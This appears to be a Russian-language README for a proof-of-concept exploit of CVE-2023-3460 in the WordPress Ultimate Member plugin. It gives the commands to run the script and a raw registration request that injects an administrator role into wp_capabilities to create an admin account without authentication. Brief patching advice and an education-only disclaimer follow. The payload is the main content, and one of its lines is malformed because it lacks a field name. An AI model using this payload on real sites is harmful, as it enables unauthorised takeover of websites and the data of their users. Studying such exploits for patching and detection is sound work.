## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-GURJOTEXPERT-CVE-2023-3460
# 🚨 CVE-2023-3460 - Эксплойт повышения привилегий в WordPress Ultimate Member
Это эксплойт типа proof-of-concept (PoC) для CVE-2023-3460 — критической уязвимости в плагине WordPress **Ultimate Member**. Он позволяет **неаутентифицированным пользователям** повышать свои привилегии до **Администратора** путем отправки вредоносного запроса на регистрацию.
> 🔥 **Воздействие:** Полная компрометация сайта через несанкционированное создание учетной записи администратора.
* * *
## 📌 Детали уязвимости
* **Затронутый плагин:** Ultimate Member
* **Затронутые версии:** ≤ 2.6.6
* **Исправленная версия:** 2.6.7
* **Тип эксплойта:** Повышение привилегий через злоупотребление регистрацией
* **Требуется аутентификация:** ❌ Нет
* **CVE:** CVE-2023-3460
* * *
## ⚙️ Требования
* Python 3
* библиотека `requests`
* библиотека `urllib3`
* библиотека `beautifulsoup4`
Установка зависимостей:
root@kitploit:~
pip3 install requests urllib3 beautifulsoup4
* * *
## 🧪 Использование эксплойта
root@kitploit:~
python3 CVE-2023-3460.py -t <TARGET_URL> -u <NEW_USERNAME> -p <NEW_PASSWORD>
### ✅ Пример:
root@kitploit:~
python3 CVE-2023-3460.py -t http://localhost/register/ -u pwnadmin -p Pass@123
* * *
## 📥 Возможности скрипта эксплойта
* Извлекает CSRF-нонс (`_wpnonce`) со страницы регистрации
* Обходит валидацию формы
* Внедряет `wp_capabilities` с ролью `administrator`
* Создает нового пользователя с правами администратора без аутентификации
* * *
## 🔐 Пример payload эксплойта
root@kitploit:~
POST /register/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
user_login=pwnadmin&
some-email@example.com&
user_password=Pass@123&
wp_càpabilities[administrator]=1&
_um_nonce=<nonce_value>
* * *
## 🛡️ Меры защиты
* Обновите плагин Ultimate Member до версии **v2.6.7** или выше
* Отключите открытую регистрацию, если она не требуется
* Отслеживайте журналы создания пользователей на предмет подозрительной активности
* * *
## 📚 Ссылки
* 🔗 Консультация Patchstack
* 🔗 CVE-2023-3460 на NVD
* * *
## ⚠️ Отказ от ответственности
Этот скрипт предоставляется **только для образовательных целей и авторизованного тестирования**. Несанкционированная эксплуатация систем незаконна и неэтична. Используйте его **только** на системах, которыми вы владеете или на тестирование которых получили разрешение.
* * *
## 👨💻 Автор
* 💀 [ГУРДЖОТ СИНГХ]
* 🔒 [LinkedIn: https://in.linkedin.com/in/gurjot-singh-8198b3220]